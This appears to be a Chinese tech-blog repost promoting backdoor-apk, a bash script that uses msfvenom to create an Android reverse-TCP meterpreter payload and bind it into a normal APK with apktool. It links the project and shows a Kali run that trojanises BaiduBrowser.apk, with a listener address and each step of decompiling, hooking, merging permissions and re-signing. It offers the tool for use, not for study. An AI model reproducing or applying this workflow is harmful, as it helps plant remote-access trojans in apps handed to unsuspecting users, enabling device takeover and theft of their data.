安卓logcat工具apk_backdoorapk 安卓APK后门捆绑脚本

backdoor-apk是通过msfvenom生成安卓payload并用apktools捆绑到正常apk的bash脚本。项目详情及使用方法可在其GitHub仓库找到,同时提及了相关安卓安全工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

92e0fc000c5db04f6789d9aca240a83a.gif

项目地址

https://github.com/dana-at-cp/backdoor-apk

项目介绍

backdoor-apk是一个bash写的脚本,通过msfvenom生成一个android的payload,然后再使用apktools将payload捆绑到正常的apk文件中。

使用方法

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

文章出处:黑客工具箱

d82bb0b13cdafb1cd6e3ea440cc28473.png

推荐文章++++

045dd039ae50813e66a38279bf1dae6f.png

*Obfuscapk:一款针对Android应用程序的黑盒混淆工具

*GDA:一款基于C++的新型Android逆向分析工具

*安卓蓝牙非交互漏洞POC还是来了(CVE-2020-0022)

73495fd9c62fb86877dc823063ac73dd.png

74434e4a441253dce794ef0b37fd3ed9.gif

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值